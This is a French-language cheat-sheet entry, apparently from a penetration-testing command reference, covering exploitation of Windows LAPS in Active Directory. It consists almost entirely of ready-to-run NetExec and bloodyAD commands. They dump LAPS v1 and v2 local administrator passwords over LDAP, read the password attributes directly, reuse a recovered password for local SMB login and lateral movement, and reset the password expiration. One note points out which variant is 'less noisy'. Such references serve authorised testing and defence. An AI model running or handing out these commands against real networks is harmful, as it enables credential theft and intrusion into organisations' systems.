Copy command
nxc ldap $DC -u $USER -p $PASS --lapsDescription: Lire les mots de passe LAPS de tous les hôtes que notre compte peut lire via l'ACL.
Exploitation
Lire les mots de passe LAPS v1/v2 et les utiliser pour mouvement latéral.
nxc ldap $DC -u $USER -p $PASS --lapsDescription: Lire les mots de passe LAPS de tous les hôtes que notre compte peut lire via l'ACL.
nxc ldap $DC -u $USER -p $PASS --laps --computer $COMPUTERDescription: LAPS ciblé sur une machine précise : moins bruyant qu'un dump complet.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object '$COMPUTER$' --attr ms-Mcs-AdmPwdDescription: Lire l'attribut LAPS v1 directement si l'ACL le permet (ms-Mcs-AdmPwd).
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object '$COMPUTER$' --attr msLAPS-EncryptedPasswordDescription: LAPS v2 (Windows LAPS) : attribut chiffré, nécessite des droits spécifiques pour déchiffrer.
nxc smb $TARGET -u Administrator -p '$LAPS_PASS' --local-authDescription: Utiliser le mot de passe LAPS récupéré pour s'authentifier localement sur la machine.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS set object '$COMPUTER$' --attr ms-Mcs-AdmPwdExpirationTime --value 0Description: Réinitialiser l'expiration LAPS à 0 : force un changement de mot de passe au prochain cycle.